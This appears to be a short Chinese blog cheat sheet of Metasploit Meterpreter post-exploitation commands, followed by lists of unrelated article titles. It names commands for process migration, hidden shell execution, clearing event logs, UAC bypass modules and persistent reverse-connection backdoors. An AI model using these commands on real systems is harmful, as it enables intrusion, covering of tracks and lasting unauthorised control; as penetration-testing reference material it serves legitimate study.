一、在meterpreter命令行下常用的操作

ps # 查看当前活跃进程

migrate pid # 将Meterpreter会话移植到进程数位pid的进程中

execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互

getpid # 获取当前进程的pid

kill pid # 杀死进程

getuid # 查看权限

clearev # 清除日志信息

sysinfo # 查看目标机系统信息

 

 

二、后渗透常用的模块

 run post/windows/gather/enum_applications #获取安装软件信息

 run post/windows/gather/enum_patches #补丁信息

绕过UAC

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

三、实现持久化控制

1、metsvc

通过服务(metsvc)启动方式，这种方式操作简单，但是其他攻击者扫描到之后也可以直接利用

2、 persistence

通过启动项启动(persistence)的方式，此方式通过反向连接的方式获得目标主机的权限，此后门存活率更高

 

最新文章

1. Python框架之Tornado（二）请求阶段
2. C+命令行+方向键=简易版扫雷
3. centos下 Vim快捷键操作命令大全
4. nancy中的诊断功能面板1
5. win7下eclipse中文字显示过小
6. 关于JS的一点summary
7. Win64位操作系统无法运行暗黑2战网D2GS的解决办法
8. Codeforces Round #327 (Div. 1) B. Chip 'n Dale Rescue Rangers 二分
9. union 与struct的空间计算
10. Guava源码分析——ServiceManager
11. 最新samba.tar.gz安装方法
12. C# Ajax 返回json数据--前后台交互
13. Java基础学习 —— 对象的克隆
14. [转]【C#】分享一个弹出浮动层，像右键菜单那样召即来挥则去
15. 安卓抓包https
16. Oracle EBS FA 本年折旧
17. Paxos 算法 ：消息传递一致性
18. 自学Python2.1-基本数据类型-字符串str(object) 上
19. 1-3Controller之Response
20. 第四章 使用Servlet处理HTTP请求

热门文章

1. ArcObjects SDK开发 021 开发框架搭建-FrameWork包设计
2. Python实验报告（第6章）
3. [0x11] 131.直方图中最大的矩形【单调栈】
4. 【转载】七个人生工具，终生受益 | SWOT、PDCA、6W2H、SMART、WBS、时间管理、二八原则
5. Spring MVC的运行流程
6. Java学习笔记：2022年1月2日
7. Spring Boot通过Actuator显示git和build的信息
8. （16）go-micro微服务jaeger链路追踪
9. 【学习笔记】动态树 Link-Cut Tree
10. (转载)Python中关键词yield怎么用？